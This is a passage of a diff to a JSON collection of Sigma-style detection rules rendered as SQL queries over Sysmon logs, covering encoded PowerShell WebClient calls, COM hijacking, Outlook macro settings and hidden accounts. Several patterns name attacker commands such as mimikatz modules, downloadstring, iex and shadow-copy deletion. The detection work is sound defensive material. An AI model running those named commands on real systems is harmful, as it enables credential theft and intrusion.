'%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgBXAGUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAFcAZQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcARQBCA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Manufacturer%' ESCAPE '\\' AND Details = '(Empty)') AND NOT ((TargetObject LIKE '%\\\\CutePDF Writer v4.0\\\\%' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\VNC Printer (PS)\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\VNC Printer (UD)\\\\%' ESCAPE '\\')) OR (TargetObject LIKE '%\\\\Version-3\\\\PDF24\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_webclient_casing.yml" + "filename": "registry_set_susp_printer_driver.yml" }, { - "title": "Suspicious SYSTEM User Process Creation", - "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "status": "test", - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", + "title": "Potential Persistence Via COM Hijacking From Suspicious Locations", + "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "status": "experimental", + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], "falsepositives": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Probable legitimate applications. If you find these please add them to an exclusion list" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_user_anomaly.yml" + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" }, { - "title": "LockerGoga Ransomware Activity", - "id": "74db3488-fd28-480a-95aa-b7af626de068", - "status": "stable", - "description": "Detects LockerGoga ransomware activity via specific command line.", - "author": "Vasiliy Burov, oscd.community", + "title": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", + "id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", + "status": "experimental", + "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1486" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-i SM-tgytutrc -s%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\LoadMacroProviderOnBoot' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_lockergoga_ransomware.yml" + "filename": "registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" }, { - "title": "Xwizard DLL Sideloading", - "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "title": "Hiding User Account Via SpecialAccounts Registry Key", + "id": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", "status": "test", - "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects modifications to the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" where the value is set to \"0\" in order to hide user account from being listed on the logon screen.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1564.002" ], "falsepositives": [ - "Windows installed on non-C drive" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\SpecialAccounts\\\\UserList%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" + "filename": "registry_set_special_accounts.yml" }, { - "title": "Potential Privilege Escalation Using Symlink Between Osk and Cmd", - "id": "e9b61244-893f-427c-b287-3e708f321c6b", + "title": "Suspicious Application Allowed Through Exploit Guard", + "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", "status": "experimental", - "description": "Detects the creation of a symbolic link between \"cmd.exe\" and the accessibility on-screen keyboard binary (osk.exe) using \"mklink\". This technique provides an elevated command prompt to the user from the login screen without the need to log in.", - "author": "frack113", + "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1546.008" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%\\\\osk.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_mklink_osk_cmd.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "CreateDump Process Dump", - "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", - "status": "experimental", - "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "status": "test", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Command lines that use the same flags" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_createdump.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "Kavremover Dropped Binary LOLBIN Usage", - "id": "d047726b-c71c-4048-a99b-2e2f50dc107d", - "status": "experimental", - "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "status": "test", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", - "tags": [ - "attack.defense_evasion", - "attack.t1127" - ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '% run run-cmd %' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\kavremover.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cleanapi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND Details LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_kavremover.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "PUA - Wsudo Suspicious Execution", - "id": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1059" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wsudo.exe' ESCAPE '\\' OR OriginalFileName = 'wsudo.exe' OR Description = 'Windows sudo utility' OR ParentImage LIKE '%\\\\wsudo-bridge.exe' ESCAPE '\\' OR (CommandLine LIKE '%-u System%' ESCAPE '\\' OR CommandLine LIKE '%-uSystem%' ESCAPE '\\' OR CommandLine LIKE '%-u TrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '%-uTrustedInstaller%' ESCAPE '\\' OR CommandLine LIKE '% --ti %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_pua_wsudo_susp_execution.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "HackTool - SharpView Execution", - "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "author": "frack113", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE 